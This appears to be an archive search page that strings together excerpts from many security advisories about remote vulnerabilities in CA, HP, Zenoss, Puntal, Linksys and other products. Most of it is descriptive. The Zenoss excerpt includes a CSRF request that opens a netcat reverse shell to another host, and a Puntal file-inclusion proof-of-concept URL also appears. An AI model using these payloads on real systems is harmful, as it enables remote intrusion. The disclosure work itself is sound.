
remote system

CA DSM gui_cm_ctrls ActiveX Control Vulnerability

Mitigating Factors: For BrightStor ARCserve Backup for Laptops & 
Desktops, only the server installation is affected. Client 
installations are not affected. For CA Desktop Management Suite, 
Unicenter Desktop Management Bundle, Unicenter Asset Management, 
Unicenter Software Delivery and Unicenter Remote Control, only the 
Managers and DSM Explorers are affected. Scalability Servers and 
Agents are not affected.


Severity: CA has given this vulnerability a maximum risk rating 

CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow Vulnerability

Mitigating Factors: For BrightStor ARCserve Backup for Laptops & 
Desktops, only the server installation is affected. Client 
installations are not affected. For CA Desktop Management Suite, 
Unicenter Desktop Management Bundle, Unicenter Asset Management, 
Unicenter Software Delivery and Unicenter Remote Control, only the 
Managers and DSM Explorers are affected. Scalability Servers and 
Agents are not affected. 

Severity: CA has given this vulnerability a maximum risk rating 
of High.

HP notebooks remote code execution vulnerability (multiple series)

Impact:
///////

Remote code execution
Remote system registry read/write access
Remote shell command execution
CA Products That Embed Ingres Multiple Vulnerabilities

EEM 8.1, 8.2, 8.2.1
eTrust Audit/SCC 8.0 sp2
Identity Manager r12
NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11
Unicenter Asset Management r11.1, r11.2
Unicenter Remote Control r11.2
Unicenter Service Catalog r2.2, r11.1
Unicenter Service Metric Analysis r11.1
Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2
Unicenter Software Delivery r11.1, r11.2
Unicenter Workload Control Center r11

Netsupport gateway remote DoS

Vendor: Netsupport
Product: Netsupport Manager
Vendor contacted 11 Nov 2009, fixed 11 Jan 2010 in version 10.60.0006

Netsupport gateway is a feature packaged with the NetSupport Manager product. "Delivering seamless Remote Control between PCs that may be located behind different firewalls. The NetSupport Gateway provides a stable and secure method for NetSupport enabled systems to locate and communicate via http."

In all versions prior to 10.60.0006 it is possible to remotely crash the service by simply telnetting to the port and hitting return twice, thereby causing a DoS. In versions prior to 10.60.0005 this would only work from Linux or Mac hosts; however, in 10.60.0005 (which was an attempt to fix the issue) it resulted in this working from Linux, Mac and Windows hosts. This variation was down to the differences in carriage returns between OSes. I presume that the root issue was providing null header information, though the vendor never confirmed.

regards


[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4

###############################################################################

Reason: missing input data validation
Attack vector: user submitted GET or POST parameter 'folder'
Preconditions: none
Result: attacker can upload any files to remote system

Source code snippet from script "check.php":
-----------------[ source code start ]---------------------------------
if (!empty($_FILES)) {
        $tempFile = $_FILES['Filedata']['tmp_name'];

Windows SMB NTLM Authentication Weak Nonce Vulnerability

---------------------------

Impact: An unauthenticated remote attacker without any kind of
credentials can access the SMB service under the credentials of an
authorized user. Depending on the privileges of the authorized user, and
the configuration of the remote system, an attacker can gain read/write
access to the remote file system and execute arbitrary code by using
DCE/RPC over SMB.
Remotely Exploitable: Yes
Bugtraq Id: <unknown>
CVE: CVE-2010-0231

HP laptops Software Update tool vulnerability

Overview:
/////////

The flaw is located in the software called HP Software Update, shipped with HP notebooks to support automatic software updates and critical vulnerability patching. One of the ActiveX controls deployed by default by the vendor contains an insecure method that gives a potential attacker arbitrary file write access on the remote system.



Impact:
///////

[Announcement] ClubHack 2011 Hacking and Security Conference

Anand Pandey - One Line Facebook
Manish Chasta - Android Forensics
Bishan Singh Kochher - DOM XSS Encounter of the 3rd Kind
Nikhil Mittal - Mere pass Teensy hain
Elad Shapira - How Android based phone helped me win American Idol
Merchant Bhaumik - Handle Exploitation of Remote System from Email account
Prashant Verma - Pentesting Mobile Applications
Vivek Ramachandran - Wi-Fi malware for Fun and Profit
Aditya Gupta - Hacking you Droid

**** Workshops ****

Ilient SysAid v8.5.05 - Multiple Web Vulnerabilities

SysAid IT Enterprise delivers the tools you need to meet any IT challenge - now and in the future.

Core Module(s):
Help Desk
Asset Management
Remote Control
End-User Web Portal
My Desktop
Mobile Application
Knowledge Base
Reports & Analysis

Vulnerability in multiple "now playing" scripts for various IRC clients

scripts with this feature which were tested. They can all be exploited by the 
same malicious mp3. This includes:
* irssi: from http://irssi.org/scripts/: ixmmsa.pl 0.3, l33tmusic.pl 2.00, 
mpg123.pl 0.01, ogg123.pl 0.01, xmms.pl 2.0, xmms2.pl 1.1.3, xmmsinfo.pl 
1.1.1.1
* XChat: many from http://xchat.org: xmms-thing 1.0, XMMS Remote Control 
Script 1.07, Disrok 1.0, a2x 0.0.1, Another xmms-info script 1.0, XChat-XMMS 
0.8.1, and more...
* weechat: from http://weechat.flashtux.org/: now-playing.rb, xmms.pl 1.1
* BitchX: from http://scripts.bitchx.org/: xmms.bx 1.0
* Konversation: included media script

[waraxe-2010-SA#077] - Multiple Vulnerabilities in Calibre 0.7.34

as files without extension (filename ends with dot) are retrievable, but in case
of a "wrong" extension the vulnerable Python script will crash because of a missing
entry in the extensions array (formal definition: exception KeyError - raised when a
mapping (dictionary) key is not found in the set of existing keys).
At first this seemed a minor security issue - only js, css, png, gif, html and
extensionless files from the remote system can be retrieved. But after playing around
for some time I found a useful artifact - concatenating a space or dot character
to the end of the filename will pass through the Python script without crashing
it and we can read arbitrary files from the remote system.
Now this is a major security issue! Below is a test script for proof of concept:
-------------------------------------------------------------------------------

Secunia Research: Free Download Manager Remote Control Server Buffer Overflow

====================================================================== 

                     Secunia Research 02/02/2009

   - Free Download Manager Remote Control Server Buffer Overflow -

====================================================================== 
Table of Contents

Affected Software....................................................1

ZDI-10-051: Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability

The specific flaw exists within the deserialization of RMIConnectionImpl
objects. Due to a lack of privilege checks during deserialization it is
possible to supply privileged code in the ClassLoader of a constructor
being deserialized. This allows for a remote attacker to call system
level Java functions without proper sandboxing. Exploitation of this can
lead to remote system compromise under the context of the currently
logged in user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:

rPSA-2008-0236-1 httpd mod_ssl

    rPath Appliance Platform Linux Service 2
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Privilege Escalation
Updated Versions:
    httpd=conary.rpath.com@rpl:2/2.2.9-1-0.1
    mod_ssl=conary.rpath.com@rpl:2/2.2.9-1-0.1

rPath Issue Tracking System:

Zenoss Multiple Admin CSRF

        defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh:
        boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
        password=letmein&sndpassword=letmein&zenScreenName=editUserSettings

     2. Change and execute a command CSRF.
     Change the ping command to be a netcat shell out to a remote system. In
     this case an internal system running on port 443

        http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
        /bin/bash 172.16.28.6 443&commandId=ping&description:text=&
        manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

rPSA-2009-0061-1 cups

    rPath Linux 1
    rPath Linux 2

Rating: Severe
Exposure Level Classification:
    Remote System User Deterministic Privilege Escalation
Updated Versions:
    cups=conary.rpath.com@rpl:1/1.1.23-14.10-1
    cups=conary.rpath.com@rpl:2/1.3.9-1.1-1

rPath Issue Tracking System:

rPSA-2007-0188-1 php5 php5-cgi php5-mysql php5-pear php5-pgsql php5-soap php5-xsl

rPath Security Advisory: 2007-0188-1
Published: 2007-09-17
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Remote System User Deterministic Unauthorized Access
Updated Versions:
    php5=/conary.rpath.com@rpl:1/5.2.4-2-1
    php5-cgi=/conary.rpath.com@rpl:1/5.2.4-2-1
    php5-mysql=/conary.rpath.com@rpl:1/5.2.4-2-1
    php5-pear=/conary.rpath.com@rpl:1/5.2.4-2-1

rPSA-2008-0178-1 php php-mysql php-pgsql

Products:
    rPath Linux 1

Rating: Critical
Exposure Level Classification:
    Remote System User Deterministic Unauthorized Access
Updated Versions:
    php=conary.rpath.com@rpl:1/4.3.11-15.17-1
    php-mysql=conary.rpath.com@rpl:1/4.3.11-15.17-1
    php-pgsql=conary.rpath.com@rpl:1/4.3.11-15.17-1


ZDI-09-087: Microsoft Internet Explorer CSS Race Condition Code Execution Vulnerability

The specific flaw exists during a race condition while repetitively
clicking between two elements at a fast rate. When clicking back and
forth between these two elements a corruption occurs resulting in a call
to a dangling pointer which can be further leveraged into code execution
via a heap spray. Exploitation of this vulnerability will lead to remote
system compromise under the credentials of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:


Re: TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities

> page.
>
> The specific flaw exists in the URL handlers associated with iTunes.
> When processing URLs via the protocol handlers "itms", "itmss", "daap",
> "pcast", and "itpc" an exploitable stack overflow occurs. Successful
> exploitation can lead to a remote system compromise under the
> credentials of the currently logged in user.
>
> -- Vendor Response:
> Apple has issued an update to correct this vulnerability. More
> details can be found at:

TEHTRI-Security released 13 0days against web tools used by evil attackers

TEHTRI-SA-2010-023 - Vuln in NEON Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-022 - Vuln in NEON Exploit Pack. SQL Injection.
TEHTRI-SA-2010-021 - Vuln in YES Exploit Pack. Remote File Disclosure.
TEHTRI-SA-2010-020 - Vuln in YES Exploit Pack. Permanent XSS+XSRF admin.
TEHTRI-SA-2010-019 - Vuln in YES Exploit Pack. Remote SQL Injection.
TEHTRI-SA-2010-018 - Vuln in LuckySploit Expl Pack. Remote control.
TEHTRI-SA-2010-017 - Vuln in Liberty Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-016 - Vuln in Liberty Exploit Pack. SQL Injection.
TEHTRI-SA-2010-015 - Vuln in Eleonore Exploit Pack. Another SQL Inject.
TEHTRI-SA-2010-014 - Vuln in Eleonore Exploit Pack. XSRF in admin panel.
TEHTRI-SA-2010-013 - Vuln in Eleonore Exploit Pack. Permanent XSS.

rPSA-2011-0013-1 openssl openssl-scripts

    rPath Linux 1
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Denial of Service
Updated Versions:
    openssl=conary.rpath.com@rpl:1/0.9.7f-10.20-1
    openssl=conary.rpath.com@rpl:2/0.9.8g-7.7-1
    openssl-scripts=conary.rpath.com@rpl:1/0.9.7f-10.13-1
    openssl-scripts=conary.rpath.com@rpl:2/0.9.8g-7.7-1

[CAL-20100204-3]Adobe Shockwave Player Director File Parsing RCSL Pointer Overwrite

in that a user must visit a malicious web site.

The specific flaw exists when the Shockwave player attempts to load a
specially crafted Adobe Director File. When a malicious value is used
during a memory dereference a possible 4-byte memory overwrite may
occur. Exploitation can lead to remote system compromise under the
credentials of the currently logged in user.


REF:
http://www.adobe.com/support/security/bulletins/apsb10-12.html

Anon Proxy Server - Remote Code Execution

By Michael Brooks

Vulnerability type: Multiple Remote System commands execution. 

Software: Anon Proxy Server

Home page: http://sourceforge.net/projects/anonproxyserver/

Affects version: 0.100


[CAL-20100204-2]Adobe Shockwave Player Director File Parsing integer overflow vulnerability

installations of Adobe's Shockwave Player. User interaction is required
in that a user must visit a malicious web site.

The specific flaw exists when the Shockwave player attempts to load a
specially crafted Adobe Director File. When a malicious value is used
extern to signed integer. Exploitation can lead to remote system
compromise under the credentials of the currently logged in user.

ref
http://hi.baidu.com/fs_fx/blog/item/fa74a61705b5e24621a4e951.html
http://www.adobe.com/support/security/bulletins/apsb10-12.html

Re: Puntal (index.php) Remote File Inclusion Vulnerabilities

>> remote attacker could send a specially-crafted URL request to the "index.php"
>> script using the "app_path=" OR "puntal_path=" parameter to specify a malicious
>> PHP file from a remote system, which would allow the attacker to execute
>> arbitrary code on the vulnerable system.
>>
>> Puntal 2.1.0 is vulnerable; other versions may also be affected.
>>

RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

> remote attacker could send a specially-crafted URL request to the "index.php"
> script using the "app_path=" OR "puntal_path=" parameter to specify a malicious
> PHP file from a remote system, which would allow the attacker to execute
> arbitrary code on the vulnerable system.
>
> Puntal 2.1.0 is vulnerable; other versions may also be affected.
>

Puntal (index.php) Remote File Inclusion Vulnerabilities

Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.

Puntal 2.1.0 is vulnerable; other versions may also be affected.

An attacker can exploit these issues via a browser.

-=[P0C]=-

http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
            or

IS-2010-002 - Linksys WAP54Gv3 Remote Debug Root Shell

and cannot be used for authenticating to the administration web interface.

Submitted commands are included within the data1 form variable, sent via a
POST request to the web server, and executed with the privileges of the httpd
web server, which runs as root on the system, allowing for complete remote
control of the access point.
Two additional variables, data2 and data3, are processed by web server
code but are not present in the form on the debug web page.
Command injection is also possible in the data2 and data3 payloads by using
typical shell command concatenation.


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.